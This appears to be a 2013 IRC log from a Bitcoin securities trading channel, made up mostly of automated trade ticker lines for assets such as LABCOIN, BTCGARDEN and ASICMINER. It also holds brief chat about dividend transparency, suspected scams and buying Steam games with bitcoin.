[BITVPS] 200 @ 0.002 = 0.4 BTC [-] Aug 06 14:12:21 [BTCTC] [LABCOIN] 1 @ 0.00159 BTC [+] Aug 06 14:12:22 [BTCTC] [LABCOIN] 1 @ 0.001599 BTC [+] Aug 06 14:13:29 [BTCTC] [LABCOIN] 324 @ 0.0016 = 0.5184 BTC [+] Aug 06 14:14:16 [BTCTC] [LABCOIN] 294 @ 0.0016 = 0.4704 BTC [+] Aug 06 14:14:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.04092 = 0.1228 BTC [-] Aug 06 14:18:38 [HAVELOCK] [XBOND] 16 @ 0.0010468 = 0.0167 BTC [-] Aug 06 14:19:41 [HAVELOCK] [LABCO] 10 @ 0.001989 = 0.0199 BTC [+] Aug 06 14:20:02 [BTCTC] [DMS.MINING] 160 @ 0.006704 = 1.0726 BTC [-] Aug 06 14:25:46 [BTCTC] [DMS.PURCHASE] 311 @ 0.02827 = 8.792 BTC [+] Aug 06 14:26:08 [BTCTC] [LABCOIN] 380 @ 0.0016 = 0.608 BTC [+] Aug 06 14:26:10 [BTCTC] [LABCOIN] 10 @ 0.0016 = 0.016 BTC [+] Aug 06 14:33:23 [BTCTC] [DMS.SELLING] 60 @ 0.0232 = 1.392 BTC [+] Aug 06 14:33:25 [BTCTC] [DMS.SELLING] 30 @ 0.02388 = 0.7164 BTC [+] Aug 06 14:33:26 [BTCTC] [DMS.SELLING] 78 @ 0.02389 = 1.8634 BTC [+] Aug 06 14:33:51 [BTCTC] [DMS.SELLING] 2 @ 0.02389 = 0.0478 BTC [+] Aug 06 14:36:52 [BTCTC] [DMS.PURCHASE] 67 @ 0.02827 = 1.8941 BTC [+] Aug 06 14:39:33 [BTCTC] [ASICMINER-PT] 1 @ 4.004 BTC [-] Aug 06 14:39:35 [BTCTC] [ASICMINER-PT] 1 @ 4.003 BTC [-] Aug 06 14:39:35 [BTCTC] [ASICMINER-PT] 5 @ 4.001 = 20.005 BTC [-] Aug 06 14:49:04 [BTCTC] [COGNITIVE] 2 @ 0.4143 = 0.8286 BTC [+] Aug 06 14:52:07 [BTCTC] [LABCOIN] 4 @ 0.001601 = 0.0064 BTC [+] Aug 06 14:52:08 [BTCTC] [LABCOIN] 5 @ 0.001618 = 0.0081 BTC [+] Aug 06 14:52:08 [BTCTC] [LABCOIN] 5 @ 0.001619 = 0.0081 BTC [+] Aug 06 14:54:24 [BTCTC] [DMS.MINING] 6 @ 0.006705 = 0.0402 BTC [+] Aug 06 14:54:26 [BTCTC] [DMS.MINING] 4 @ 0.006704 = 0.0268 BTC [-] Aug 06 14:54:27 [BTCTC] [DMS.MINING] 42 @ 0.006703 = 0.2815 BTC [-] Aug 06 14:54:29 [BTCTC] [DMS.SELLING] 52 @ 0.022 = 1.144 BTC [-] Aug 06 14:55:21 [BTCTC] [DMS.PURCHASE] 52 @ 0.02827 = 1.47 BTC [+] **** BEGIN LOGGING AT Tue Aug 6 15:51:54 2013 Aug 06 15:52:12 japanese princess? Aug 06 15:52:33 [HAVELOCK] [AM1] 11 @ 4 = 44 BTC [-] Aug 06 15:52:35 [HAVELOCK] [AM1] 1 @ 4 BTC [-] Aug 06 15:52:50 [BTCTC] [DMS.SELLING] 50 @ 0.023 = 1.15 BTC [-] Aug 06 15:53:35 [BTCTC] [DMS.PURCHASE] 50 @ 0.02827 = 1.4135 BTC [+] Aug 06 15:58:55 now this is getting interesting: http://coinforest.com/?ref=gandi-mail1 Aug 06 16:00:41 the hell would i pay $20 for a .co domain Aug 06 16:01:09 bitcoin must be causing bitbraindamage Aug 06 16:01:21 [HAVELOCK] [XBOND] 8 @ 0.00104 = 0.0083 BTC [-] Aug 06 16:04:53 you're missing the price where it's usually more expensive Aug 06 16:06:18 [BTCTC] [DMS.PURCHASE] 86 @ 0.02827 = 2.4312 BTC [+] Aug 06 16:07:55 lol Aug 06 16:08:30 [BTCTC] [DMS.MINING] 6 @ 0.0066 = 0.0396 BTC [+] Aug 06 16:08:33 [BTCTC] [DMS.MINING] 1 @ 0.0066 BTC [+] Aug 06 16:09:17 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.002499 = 0.01 BTC [+] Aug 06 16:10:28 [BTCTC] [DMS.MINING] 32 @ 0.00655 = 0.2096 BTC [-] Aug 06 16:10:30 [BTCTC] [DMS.MINING] 50 @ 0.00651 = 0.3255 BTC [-] Aug 06 16:10:30 [BTCTC] [DMS.MINING] 1 @ 0.006505 BTC [-] Aug 06 16:10:58 [BTCTC] [DMS.MINING] 8 @ 0.0066 = 0.0528 BTC [+] Aug 06 16:11:26 [BTCTC] [DMS.SELLING] 5 @ 0.02345 = 0.1173 BTC [+] Aug 06 16:12:29 [BTCTC] [DMS.MINING] 48 @ 0.006351 = 0.3048 BTC [-] Aug 06 16:14:00 [BTCTC] [LABCOIN] 14 @ 0.001576 = 0.0221 BTC [+] Aug 06 16:14:02 [BTCTC] [LABCOIN] 50 @ 0.001563 = 0.0782 BTC [-] Aug 06 16:15:30 [BTCTC] [DMS.SELLING] 27 @ 0.02345 = 0.6332 BTC [+] Aug 06 16:18:34 [BTCTC] [LABCOIN] 235 @ 0.00157 = 0.369 BTC [+] Aug 06 16:19:56 [MPEX] [S.MPOE] 1535 @ 0.00082819 = 1.2713 BTC [-] Aug 06 16:21:42 [HAVELOCK] [XBOND] 1 @ 0.00104 BTC [-] Aug 06 16:23:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.0406 = 0.1218 BTC [-] Aug 06 16:23:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.0406 = 0.406 BTC [-] Aug 06 16:28:04 [BTCTC] [DMS.MINING] 50 @ 0.006352 = 0.3176 BTC [+] Aug 06 16:30:31 [BTCTC] [LABCOIN] 235 @ 0.001598 = 0.3755 BTC [+] Aug 06 16:30:39 [BTCTC] [B.YABMC] 95 @ 0.002318 = 0.2202 BTC [-] Aug 06 16:32:40 [MPEX] [S.MPOE] 13243 @ 0.00082603 = 10.9391 BTC [-] Aug 06 16:35:48 [BTCTC] [LABCOIN] 29 @ 0.001597 = 0.0463 BTC [-] Aug 06 16:36:21 [HAVELOCK] [XBOND] 2 @ 0.00104 = 0.0021 BTC [-] Aug 06 16:36:56 [HAVELOCK] [SMG] 1 @ 0.00024 BTC [+] Aug 06 16:41:42 Is there any transparency on these dividend payouts? I imagine its more corrupt than the markets of nigeria Aug 06 16:43:24 Of course there is transperency. Aug 06 16:43:45 All you need is access to their pool data and the rest is basic math. Aug 06 16:43:46 [BTCTC] [LABCOIN] 235 @ 0.001594 = 0.3746 BTC [-] Aug 06 16:43:47 [BTCTC] [LABCOIN] 9 @ 0.001595 = 0.0144 BTC [+] Aug 06 16:44:30 [HAVELOCK] [XBOND] 1 @ 0.001035 BTC [-] Aug 06 16:44:30 I'm pretty sure all mining securities make their hashing power public and site their pools. If there is one that doesn't share that I'd stay away. Aug 06 16:45:03 [HAVELOCK] [XBOND] 3 @ 0.001033 = 0.0031 BTC [-] Aug 06 16:45:06 [HAVELOCK] [XBOND] 100 @ 0.001033 = 0.1033 BTC [-] Aug 06 16:45:28 Where it *could* get shady is in hardware sales, depending on how the sales are made. I believe AM sells most of theirs via public auction, though. Aug 06 16:47:58 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Aug 06 16:55:48 [BTCTC] [LABCOIN] 21 @ 0.001592 = 0.0334 BTC [-] Aug 06 16:58:48 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 06 16:59:14 [HAVELOCK] [XBOND] 7 @ 0.001033 = 0.0072 BTC [-] Aug 06 17:00:08 [HAVELOCK] [XBOND] 890 @ 0.001033 = 0.9194 BTC [-] Aug 06 17:00:49 [BTCTC] [S.MPOE-PT] 311 @ 0.0009 = 0.2799 BTC [-] Aug 06 17:00:52 [BTCTC] [BTCGARDEN] 1 @ 0.01607 BTC [+] Aug 06 17:01:41 [BTCTC] [BTCGARDEN] 300 @ 0.01608 = 4.824 BTC [+] Aug 06 17:01:43 [BTCTC] [BTCGARDEN] 300 @ 0.01609 = 4.827 BTC [+] Aug 06 17:02:21 [BTCTC] [ACTIVEMINING] 5 @ 0.006273 = 0.0314 BTC [-] Aug 06 17:03:11 [BTCTC] [BTCGARDEN] 50 @ 0.0161 = 0.805 BTC [+] Aug 06 17:03:29 [BTCTC] [BTCGARDEN] 370 @ 0.0161 = 5.957 BTC [+] Aug 06 17:04:59 [BTCTC] [BTCGARDEN] 20 @ 0.01608 = 0.3216 BTC [-] Aug 06 17:05:19 [BTCTC] [BTCGARDEN] 56 @ 0.01607 = 0.8999 BTC [-] Aug 06 17:05:21 [BTCTC] [BTCGARDEN] 8 @ 0.01607 = 0.1286 BTC [-] Aug 06 17:05:22 [HAVELOCK] [XBOND] 5 @ 0.00103999 = 0.0052 BTC [+] Aug 06 17:05:48 [BTCTC] [BTCGARDEN] 16 @ 0.01601 = 0.2562 BTC [-] Aug 06 17:07:16 [BTCTC] [BTCGARDEN] 1415 @ 0.01601 = 22.6542 BTC [-] Aug 06 17:07:33 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [+] Aug 06 17:08:04 [HAVELOCK] [XBOND] 97 @ 0.00103999 = 0.1009 BTC [+] Aug 06 17:11:15 [BTCTC] [LABCOIN] 7 @ 0.001599 = 0.0112 BTC [+] Aug 06 17:11:16 [BTCTC] [LABCOIN] 63 @ 0.0016 = 0.1008 BTC [+] Aug 06 17:11:17 [BTCTC] [LABCOIN] 5 @ 0.001613 = 0.0081 BTC [+] Aug 06 17:11:18 [BTCTC] [LABCOIN] 42 @ 0.001614 = 0.0678 BTC [+] Aug 06 17:11:19 [BTCTC] [LABCOIN] 15 @ 0.001615 = 0.0242 BTC [+] Aug 06 17:11:20 [BTCTC] [LABCOIN] 123 @ 0.001616 = 0.1988 BTC [+] Aug 06 17:11:21 [BTCTC] [LABCOIN] 3 @ 0.00162 = 0.0049 BTC [+] Aug 06 17:11:22 [BTCTC] [LABCOIN] 25 @ 0.001621 = 0.0405 BTC [+] Aug 06 17:11:24 [BTCTC] [LABCOIN] 3 @ 0.001622 = 0.0049 BTC [+] Aug 06 17:11:25 [BTCTC] [LABCOIN] 103 @ 0.001622 = 0.1671 BTC [+] Aug 06 17:11:26 [BTCTC] [LABCOIN] 1 @ 0.001623 BTC [+] Aug 06 17:11:27 mmm Aug 06 17:11:33 [BTCTC] [BTCGARDEN] 469 @ 0.01601 = 7.5087 BTC [-] Aug 06 17:11:58 [BTCTC] [BTCGARDEN] 390 @ 0.016 = 6.24 BTC [-] Aug 06 17:12:00 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [-] Aug 06 17:12:01 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [-] Aug 06 17:12:26 [BTCTC] [LABCOIN] 50 @ 0.001618 = 0.0809 BTC [-] Aug 06 17:12:27 [BTCTC] [LABCOIN] 16 @ 0.001619 = 0.0259 BTC [+] Aug 06 17:12:29 [BTCTC] [LABCOIN] 103 @ 0.001622 = 0.1671 BTC [+] Aug 06 17:12:57 [BTCTC] [LABCOIN] 235 @ 0.001594 = 0.3746 BTC [-] Aug 06 17:12:59 [BTCTC] [LABCOIN] 79 @ 0.001592 = 0.1258 BTC [-] Aug 06 17:13:00 [BTCTC] [LABCOIN] 11 @ 0.001578 = 0.0174 BTC [-] Aug 06 17:13:00 [BTCTC] [LABCOIN] 2 @ 0.001571 = 0.0031 BTC [-] Aug 06 17:13:03 [BTCTC] [LABCOIN] 5 @ 0.001571 = 0.0079 BTC [-] Aug 06 17:13:04 [BTCTC] [LABCOIN] 30 @ 0.00157 = 0.0471 BTC [-] Aug 06 17:13:05 [BTCTC] [LABCOIN] 17 @ 0.001569 = 0.0267 BTC [-] Aug 06 17:13:05 [BTCTC] [LABCOIN] 2 @ 0.00156 = 0.0031 BTC [-] Aug 06 17:13:06 [BTCTC] [LABCOIN] 20 @ 0.001559 = 0.0312 BTC [-] Aug 06 17:13:07 [BTCTC] [LABCOIN] 125 @ 0.001558 = 0.1948 BTC [-] Aug 06 17:13:08 [BTCTC] [LABCOIN] 1000 @ 0.001557 = 1.557 BTC [-] Aug 06 17:13:10 [BTCTC] [LABCOIN] 784 @ 0.001531 = 1.2003 BTC [-] Aug 06 17:13:36 [BTCTC] [DMS.PURCHASE] 350 @ 0.02827 = 9.8945 BTC [+] Aug 06 17:13:54 shitgardens back to ipo price Aug 06 17:13:56 [BTCTC] [LABCOIN] 50 @ 0.001618 = 0.0809 BTC [+] Aug 06 17:13:57 [BTCTC] [LABCOIN] 235 @ 0.001619 = 0.3805 BTC [+] Aug 06 17:14:24 too bad Aug 06 17:14:46 [BTCTC] [LABCOIN] 50 @ 0.001614 = 0.0807 BTC [-] Aug 06 17:14:47 [BTCTC] [LABCOIN] 35 @ 0.001615 = 0.0565 BTC [+] Aug 06 17:15:17 [BTCTC] [CRYPTO-TRADE] 5 @ 0.194 = 0.97 BTC [+] Aug 06 17:15:17 [BTCTC] [CRYPTO-TRADE] 35 @ 0.1932 = 6.762 BTC [-] Aug 06 17:15:44 [BTCTC] [LABCOIN] 50 @ 0.00161 = 0.0805 BTC [-] Aug 06 17:16:51 [BTCTC] [LABCOIN] 15 @ 0.001606 = 0.0241 BTC [-] Aug 06 17:17:09 [BTCTC] [LABCOIN] 1 @ 0.001605 BTC [-] Aug 06 17:20:00 [BTCTC] [LABCOIN] 100 @ 0.00158 = 0.158 BTC [-] Aug 06 17:21:00 [BTCTC] [LABCOIN] 50 @ 0.001592 = 0.0796 BTC [+] Aug 06 17:21:01 [BTCTC] [LABCOIN] 173 @ 0.001593 = 0.2756 BTC [+] Aug 06 17:21:44 [HAVELOCK] [XBOND] 4 @ 0.00103999 = 0.0042 BTC [+] Aug 06 17:23:32 [BTCTC] [BTCGARDEN] 1 @ 0.01591 BTC [-] Aug 06 17:29:07 [BTCTC] [BTCGARDEN] 1 @ 0.01608 BTC [+] Aug 06 17:30:41 [BTCTC] [DMS.MINING] 5 @ 0.0065 = 0.0325 BTC [+] Aug 06 17:33:44 [BTCTC] [BASIC-MINING] 1 @ 0.4131 BTC [-] Aug 06 17:37:13 [BTCTC] [DMS.MINING] 15 @ 0.0065 = 0.0975 BTC [+] Aug 06 17:37:15 [BTCTC] [DMS.MINING] 10 @ 0.0065 = 0.065 BTC [+] Aug 06 17:39:56 [BTCTC] [DMS.MINING] 5 @ 0.0065 = 0.0325 BTC [+] Aug 06 17:41:19 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [-] Aug 06 17:41:19 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 06 17:42:12 [BTCTC] [DMS.MINING] 2 @ 0.006369 = 0.0127 BTC [-] Aug 06 17:42:14 [BTCTC] [DMS.MINING] 1 @ 0.006365 BTC [-] Aug 06 17:42:15 [BTCTC] [DMS.MINING] 90 @ 0.006364 = 0.5728 BTC [-] Aug 06 17:42:16 [BTCTC] [DMS.MINING] 100 @ 0.006362 = 0.6362 BTC [-] Aug 06 17:42:18 [BTCTC] [DMS.MINING] 19 @ 0.00636 = 0.1208 BTC [-] Aug 06 17:45:00 [BTCTC] [DMS.PURCHASE] 2340 @ 0.02827 = 66.1518 BTC [+] Aug 06 17:45:43 [BTCTC] [ACTIVEMINING] 50 @ 0.00614 = 0.307 BTC [-] Aug 06 17:45:45 [BTCTC] [ACTIVEMINING] 68 @ 0.006139 = 0.4175 BTC [-] Aug 06 17:45:46 [BTCTC] [ACTIVEMINING] 50 @ 0.006123 = 0.3062 BTC [-] Aug 06 17:45:47 [BTCTC] [ACTIVEMINING] 2 @ 0.0061 = 0.0122 BTC [-] Aug 06 17:45:48 [BTCTC] [ACTIVEMINING] 20 @ 0.006084 = 0.1217 BTC [-] Aug 06 17:45:49 [BTCTC] [ACTIVEMINING] 100 @ 0.006083 = 0.6083 BTC [-] Aug 06 17:45:50 [BTCTC] [ACTIVEMINING] 6 @ 0.006024 = 0.0361 BTC [-] Aug 06 17:45:51 [BTCTC] [ACTIVEMINING] 30 @ 0.006023 = 0.1807 BTC [-] Aug 06 17:45:52 [BTCTC] [ACTIVEMINING] 99 @ 0.006021 = 0.5961 BTC [-] Aug 06 17:45:53 [BTCTC] [ACTIVEMINING] 95 @ 0.00602 = 0.5719 BTC [-] Aug 06 17:45:54 [BTCTC] [ACTIVEMINING] 200 @ 0.006019 = 1.2038 BTC [-] Aug 06 17:45:56 [BTCTC] [ACTIVEMINING] 200 @ 0.006018 = 1.2036 BTC [-] Aug 06 17:45:57 [BTCTC] [ACTIVEMINING] 8 @ 0.006011 = 0.0481 BTC [-] Aug 06 17:45:58 [BTCTC] [ACTIVEMINING] 40 @ 0.00601 = 0.2404 BTC [-] Aug 06 17:46:55 [BTCTC] [ACTIVEMINING] 25 @ 0.006007 = 0.1502 BTC [-] Aug 06 17:46:55 [BTCTC] [ACTIVEMINING] 9 @ 0.006006 = 0.0541 BTC [-] Aug 06 17:49:25 [MPEX] [S.MPOE] 1150 @ 0.00082738 = 0.9515 BTC [+] Aug 06 17:52:03 [HAVELOCK] [XBOND] 20 @ 0.00103999 = 0.0208 BTC [+] Aug 06 17:52:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0402 BTC [-] Aug 06 17:52:49 [BTCTC] [ASICMINER-PT] 1 @ 4.009 BTC [-] Aug 06 17:56:12 [BTCTC] [DMS.PURCHASE] 500 @ 0.02827 = 14.135 BTC [+] Aug 06 17:56:53 [BTCTC] [DMS.PURCHASE] 70 @ 0.02827 = 1.9789 BTC [+] Aug 06 17:57:33 [HAVELOCK] [XBOND] 115 @ 0.00103999 = 0.1196 BTC [+] Aug 06 18:00:44 [BTCTC] [DMS.MINING] 3 @ 0.006361 = 0.0191 BTC [+] Aug 06 18:00:46 [BTCTC] [DMS.MINING] 1 @ 0.00636 BTC [-] Aug 06 18:00:48 [BTCTC] [DMS.MINING] 134 @ 0.006352 = 0.8512 BTC [-] Aug 06 18:00:49 [BTCTC] [DMS.MINING] 52 @ 0.006351 = 0.3303 BTC [-] Aug 06 18:00:51 [BTCTC] [DMS.MINING] 10 @ 0.006351 = 0.0635 BTC [-] Aug 06 18:00:51 [BTCTC] [DMS.MINING] 250 @ 0.00635 = 1.5875 BTC [-] Aug 06 18:04:12 [HAVELOCK] [XBOND] 25 @ 0.00103599 = 0.0259 BTC [-] Aug 06 18:04:20 [HAVELOCK] [XBOND] 100 @ 0.00103251 = 0.1033 BTC [-] Aug 06 18:04:29 [HAVELOCK] [XBOND] 300 @ 0.0010325 = 0.3098 BTC [-] Aug 06 18:04:40 [HAVELOCK] [XBOND] 30 @ 0.00103214 = 0.031 BTC [-] Aug 06 18:04:50 [HAVELOCK] [XBOND] 1000 @ 0.00103213 = 1.0321 BTC [-] Aug 06 18:05:22 [HAVELOCK] [XBOND] 100 @ 0.00103213 = 0.1032 BTC [-] Aug 06 18:06:52 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [+] Aug 06 18:11:25 [BTCTC] [LABCOIN] 150 @ 0.001555 = 0.2333 BTC [-] Aug 06 18:11:26 [BTCTC] [LABCOIN] 20 @ 0.00153 = 0.0306 BTC [-] Aug 06 18:11:27 [BTCTC] [LABCOIN] 50 @ 0.001528 = 0.0764 BTC [-] Aug 06 18:12:43 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [+] Aug 06 18:12:55 [BTCTC] [BTCGARDEN] 40 @ 0.0159 = 0.636 BTC [-] Aug 06 18:12:56 [BTCTC] [BTCGARDEN] 1 @ 0.0157 BTC [-] Aug 06 18:12:58 [BTCTC] [BTCGARDEN] 1459 @ 0.0157 = 22.9063 BTC [-] Aug 06 18:15:00 [BTCTC] [DMS.PURCHASE] 7 @ 0.02827 = 0.1979 BTC [+] Aug 06 18:15:24 [HAVELOCK] [LABCO] 10 @ 0.001985 = 0.0199 BTC [-] Aug 06 18:15:58 [HAVELOCK] [LABCO] 19 @ 0.00199 = 0.0378 BTC [+] Aug 06 18:16:52 [HAVELOCK] [XBOND] 100 @ 0.00103999 = 0.104 BTC [+] Aug 06 18:18:28 [BTCTC] [LABCOIN] 40 @ 0.001563 = 0.0625 BTC [+] Aug 06 18:18:29 [BTCTC] [LABCOIN] 452 @ 0.001587 = 0.7173 BTC [+] Aug 06 18:18:31 [BTCTC] [LABCOIN] 3908 @ 0.001588 = 6.2059 BTC [+] Aug 06 18:19:05 [BTCTC] [LABCOIN] 20 @ 0.001561 = 0.0312 BTC [-] Aug 06 18:19:58 [BTCTC] [LABCOIN] 6 @ 0.001559 = 0.0094 BTC [-] Aug 06 18:20:42 [MPEX] [S.MPOE] 8074 @ 0.00082819 = 6.6868 BTC [+] Aug 06 18:22:03 [HAVELOCK] [LABCO] 81 @ 0.00199 = 0.1612 BTC [+] Aug 06 18:22:05 [HAVELOCK] [LABCO] 10 @ 0.001985 = 0.0199 BTC [-] Aug 06 18:25:00 [BTCTC] [BASIC-MINING] 1 @ 0.416 BTC [+] Aug 06 18:26:03 [BTCTC] [BTCGARDEN] 1 @ 0.01607 BTC [+] Aug 06 18:26:37 [BTCTC] [BTCGARDEN] 1 @ 0.01607 BTC [+] Aug 06 18:27:24 [BTCTC] [COGNITIVE] 1 @ 0.414 BTC [-] Aug 06 18:27:26 [BTCTC] [COGNITIVE] 3 @ 0.41 = 1.23 BTC [-] Aug 06 18:30:03 [MPEX] [S.MPOE] 3750 @ 0.00082738 = 3.1027 BTC [-] Aug 06 18:30:34 [HAVELOCK] [LABCO] 10 @ 0.00141 = 0.0141 BTC [-] Aug 06 18:31:53 [BTCTC] [DMS.PURCHASE] 230 @ 0.02827 = 6.5021 BTC [+] Aug 06 18:41:00 [BTCTC] [DMS.PURCHASE] 2 @ 0.02814 = 0.0563 BTC [-] Aug 06 18:41:03 [BTCTC] [LABCOIN] 235 @ 0.001528 = 0.3591 BTC [-] Aug 06 18:41:04 [BTCTC] [LABCOIN] 29 @ 0.001527 = 0.0443 BTC [-] Aug 06 18:41:06 [BTCTC] [LABCOIN] 10 @ 0.001522 = 0.0152 BTC [-] Aug 06 18:41:06 [BTCTC] [LABCOIN] 65 @ 0.001521 = 0.0989 BTC [-] Aug 06 18:41:07 [BTCTC] [LABCOIN] 20 @ 0.00152 = 0.0304 BTC [-] Aug 06 18:41:08 [BTCTC] [LABCOIN] 12 @ 0.001519 = 0.0182 BTC [-] Aug 06 18:41:09 [BTCTC] [LABCOIN] 100 @ 0.001518 = 0.1518 BTC [-] Aug 06 18:41:11 [BTCTC] [LABCOIN] 1303 @ 0.001515 = 1.974 BTC [-] Aug 06 18:41:12 [BTCTC] [LABCOIN] 1576 @ 0.001514 = 2.3861 BTC [-] Aug 06 18:44:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.0402 = 0.2814 BTC [-] Aug 06 18:47:26 [BTCTC] [ACTIVEMINING] 10 @ 0.006002 = 0.06 BTC [-] Aug 06 18:48:19 [HAVELOCK] [XBOND] 4 @ 0.001033 = 0.0041 BTC [-] Aug 06 18:52:07 [BTCTC] [KENILWORTH] 4 @ 0.0018 = 0.0072 BTC [+] Aug 06 18:52:20 [BTCTC] [LABCOIN] 32 @ 0.00155 = 0.0496 BTC [+] Aug 06 18:57:36 mjr_: already seen http://online.wsj.com/article/SB10001424127887323997004578644491403250124.html ? Aug 06 19:01:35 [HAVELOCK] [XBOND] 1 @ 0.001033 BTC [-] Aug 06 19:03:21 [BTCTC] [LABCOIN] 92 @ 0.00155 = 0.1426 BTC [+] Aug 06 19:03:56 is kennilworth a scam Aug 06 19:04:03 [HAVELOCK] [XBOND] 1040 @ 0.001033 = 1.0743 BTC [-] Aug 06 19:04:07 probably Aug 06 19:04:40 wtf is that ridiculous sell wall Aug 06 19:05:17 [BTCTC] [LABCOIN] 1 @ 0.00155 BTC [+] Aug 06 19:05:19 [BTCTC] [LABCOIN] 239 @ 0.001517 = 0.3626 BTC [-] Aug 06 19:05:38 [BTCTC] [ACTIVEMINING] 10 @ 0.006249 = 0.0625 BTC [+] Aug 06 19:06:11 [BTCTC] [BTCGARDEN] 24 @ 0.01607 = 0.3857 BTC [+] Aug 06 19:06:21 i accidently just purchased some Aug 06 19:06:25 lol man its pissed me off Aug 06 19:07:28 That's been there for a long time Aug 06 19:07:32 [HAVELOCK] [AM100] 2 @ 0.0392 = 0.0784 BTC [-] Aug 06 19:07:35 [HAVELOCK] [AM100] 1 @ 0.03910001 BTC [-] Aug 06 19:07:37 [HAVELOCK] [AM100] 51 @ 0.039 = 1.989 BTC [-] Aug 06 19:07:37 it hasn't gained enough steam to break yet Aug 06 19:07:39 [HAVELOCK] [AM100] 10 @ 0.0382 = 0.382 BTC [-] Aug 06 19:07:40 http://bcoinnews.com/2013/08/06/bitburner-with-a-lego-housing/ Aug 06 19:07:41 [HAVELOCK] [AM100] 162 @ 0.0381006 = 6.1723 BTC [-] Aug 06 19:07:43 [HAVELOCK] [AM100] 11 @ 0.0381 = 0.4191 BTC [-] Aug 06 19:07:45 [HAVELOCK] [AM100] 10 @ 0.0381 = 0.381 BTC [-] Aug 06 19:07:47 [HAVELOCK] [AM100] 139 @ 0.03806 = 5.2903 BTC [-] Aug 06 19:10:03 anyone buying steam shit for btc ? Aug 06 19:12:06 i think so Aug 06 19:12:12 i forget the name Aug 06 19:12:16 there's a website Aug 06 19:12:28 http://www.steambits.com/ Aug 06 19:12:31 SteamBits Aug 06 19:13:28 [BTCTC] [DMS.MINING] 3 @ 0.0066 = 0.0198 BTC [+] Aug 06 19:14:05 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [+] Aug 06 19:15:11 "This game is not currently offered on SteamBits!" Aug 06 19:15:12 herp Aug 06 19:15:33 [BTCTC] [BTCGARDEN] 28 @ 0.01575 = 0.441 BTC [-] Aug 06 19:15:36 mp: fyi https://bitcointalk.org/index.php?topic=252531.msg2876791#msg2876791 Aug 06 19:15:49 [BTCTC] [BTCGARDEN] 22 @ 0.01574 = 0.3463 BTC [-] Aug 06 19:16:03 there are many steam games on bitmit too Aug 06 19:16:11 dexX7 lol ok. Aug 06 19:16:18 [BTCTC] [BTCGARDEN] 28 @ 0.01573 = 0.4404 BTC [-] Aug 06 19:16:19 [BTCTC] [BTCGARDEN] 30 @ 0.01572 = 0.4716 BTC [-] Aug 06 19:16:21 [BTCTC] [BTCGARDEN] 41 @ 0.0157 = 0.6437 BTC [-] Aug 06 19:16:22 [BTCTC] [BTCGARDEN] 41 @ 0.01555 = 0.6376 BTC [-] Aug 06 19:16:23 [BTCTC] [BTCGARDEN] 24 @ 0.01554 = 0.373 BTC [-] Aug 06 19:16:39 dexX7: I see you deleted your post on btcgarden Aug 06 19:16:41 much more interesting would be the skamskimo bob's asset report for july Aug 06 19:16:51 yes i did Aug 06 19:16:53 what's your take on this? Aug 06 19:17:04 no idea :p Aug 06 19:17:09 my understanding was almost zero and i didn't want to spread rumors Aug 06 19:17:15 ok Aug 06 19:17:32 but as far as i understand there was even a btcman mod who rebelled Aug 06 19:17:37 called nightcat Aug 06 19:17:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.0402 = 0.603 BTC [-] Aug 06 19:17:53 and it's about banning members on btcman who asked questions about the company Aug 06 19:18:51 can you get the guy to come here ? Aug 06 19:19:30 [BTCTC] [DMS.PURCHASE] 7 @ 0.02814 = 0.197 BTC [-] Aug 06 19:20:14 well, i could send him a pm, but so could you Aug 06 19:20:36 i thought you knew him. i don't. Aug 06 19:20:48 no i don't.. just found the post :) Aug 06 19:20:54 [BTCTC] [BASIC-MINING] 1 @ 0.4199 BTC [+] Aug 06 19:20:55 [BTCTC] [BASIC-MINING] 4 @ 0.42 = 1.68 BTC [+] Aug 06 19:21:06 pankkake: there are some chinese who say it's a "group which wants lower share prices" Aug 06 19:21:47 heh. Aug 06 19:22:11 [HAVELOCK] [XBOND] 18 @ 0.00103999 = 0.0187 BTC [+] Aug 06 19:23:19 [BTCTC] [ACTIVEMINING] 50 @ 0.006027 = 0.3014 BTC [-] Aug 06 19:23:21 [BTCTC] [ACTIVEMINING] 18 @ 0.006026 = 0.1085 BTC [-] Aug 06 19:24:36 [BTCTC] [ACTIVEMINING] 22 @ 0.006028 = 0.1326 BTC [+] Aug 06 19:25:20 [BTCTC] [ACTIVEMINING] 46 @ 0.006028 = 0.2773 BTC [+] Aug 06 19:25:21 [BTCTC] [ACTIVEMINING] 10 @ 0.006027 = 0.0603 BTC [-] Aug 06 19:25:23 [BTCTC] [ACTIVEMINING] 200 @ 0.006001 = 1.2002 BTC [-] Aug 06 19:25:24 [BTCTC] [ACTIVEMINING] 1000 @ 0.006 = 6 BTC [-] Aug 06 19:25:25 [BTCTC] [ACTIVEMINING] 364 @ 0.005904 = 2.1491 BTC [-] Aug 06 19:25:26 [BTCTC] [ACTIVEMINING] 300 @ 0.005902 = 1.7706 BTC [-] Aug 06 19:25:40 [BTCTC] [DMS.MINING] 6 @ 0.006687 = 0.0401 BTC [+] Aug 06 19:25:53 [HAVELOCK] [LABCO] 1 @ 0.00141 BTC [-] Aug 06 19:25:56 [HAVELOCK] [LABCO] 43 @ 0.0014 = 0.0602 BTC [-] Aug 06 19:25:58 [BTCTC] [ACTIVEMINING] 51 @ 0.005858 = 0.2988 BTC [-] Aug 06 19:26:00 [BTCTC] [ACTIVEMINING] 29 @ 0.005857 = 0.1699 BTC [-] Aug 06 19:26:22 [HAVELOCK] [AM100] 2 @ 0.04 = 0.08 BTC [+] Aug 06 19:26:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002539 BTC [+] Aug 06 19:28:10 [HAVELOCK] [XBOND] 4 @ 0.00103999 = 0.0042 BTC [+] Aug 06 19:28:56 [HAVELOCK] [LABCO] 230 @ 0.001351 = 0.3107 